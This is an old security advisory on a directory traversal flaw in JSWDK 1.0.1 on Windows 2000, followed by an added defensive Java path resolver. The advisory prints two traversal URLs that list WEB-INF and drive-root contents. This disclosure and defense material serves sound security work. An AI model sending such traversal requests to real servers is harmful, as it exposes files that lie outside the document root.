Topic: JavaServer Web Dev Kit (JSWDK) 1.0.1 for Win2000 Directory Traversal Vulnerability

vulnerable:
Microsoft Win2000 + JSWDK 1.0.1
Other operating systems may also be affected.

discussion:
A security vulnerability has been found in Windows NT/2000 systems that have JSWDK 1.0.1 installed. The vulnerability allows remote attackers to access files outside the document root directory.

exploits:
http://localhost:8080/examples//WEB-INF/
lists the /WEB-INF/ directory.

http://localhost:8080/../examples//WEB-INF/../../../../../
If JSWDK is installed in c:\, this request lists all files and directories in c:\.

solution:
Update JSWDK.

Copyright 2000-2001 CHINANSL. All Rights Reserved.

CHINANSL Security Team <[EMAIL PROTECTED]>
CHINANSL INFORMATION TECHNOLOGY CO.,LTD (http://www.chinansl.com)
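For servers that map request paths onto a document root themselves, the two requests above show what the mapping has to refuse: a doubled slash in front of WEB-INF and ".." segments that climb past the root. The following is an added example, not code from JSWDK or from the advisory's authors; the class name DocRootResolver, the resolve method and the "webpages" root are hypothetical, and the request path is assumed to be already URL-decoded.

```java
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.util.ArrayDeque;
import java.util.Deque;

// Added example: a hypothetical resolver, not JSWDK source code.
public class DocRootResolver {
    // Maps an already URL-decoded request path to a file under docRoot, or null to refuse.
    static Path resolve(Path docRoot, String requestPath) {
        // '\' is a separator on Windows, ':' names drives and NTFS streams,
        // NUL can truncate a name in native calls.
        for (char c : new char[] {'\\', ':', '\0'}) {
            if (requestPath.indexOf(c) >= 0) return null;
        }
        Deque<String> kept = new ArrayDeque<>();
        for (String seg : requestPath.split("/")) {
            if (seg.isEmpty() || seg.equals(".")) continue;  // collapses "//" and "/./"
            if (seg.equals("..")) {
                if (kept.isEmpty()) return null;             // would climb above the root
                kept.removeLast();
                continue;
            }
            // Windows file names are case-insensitive, so compare that way.
            if (seg.equalsIgnoreCase("WEB-INF") || seg.equalsIgnoreCase("META-INF")) {
                return null;                                 // never served to clients
            }
            kept.addLast(seg);
        }
        try {
            Path root = docRoot.toAbsolutePath().normalize();
            Path target = root;
            for (String seg : kept) target = target.resolve(seg);
            target = target.normalize();
            // Containment check on the final, normalized result.
            return target.startsWith(root) ? target : null;
        } catch (InvalidPathException e) {
            return null;                                     // name the platform rejects
        }
    }
    public static void main(String[] args) {
        Path root = Path.of("webpages");                     // constructed document root
        String[] samples = {                                 // two paths from the advisory, one benign
            "/examples//WEB-INF/",
            "/../examples//WEB-INF/../../../../../",
            "/examples/index.html"
        };
        for (String s : samples) System.out.println(s + " -> " + resolve(root, s));
    }
}
```

The check is lexical only: where symbolic links or junctions can exist under the document root, compare `toRealPath()` results instead of normalized paths.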
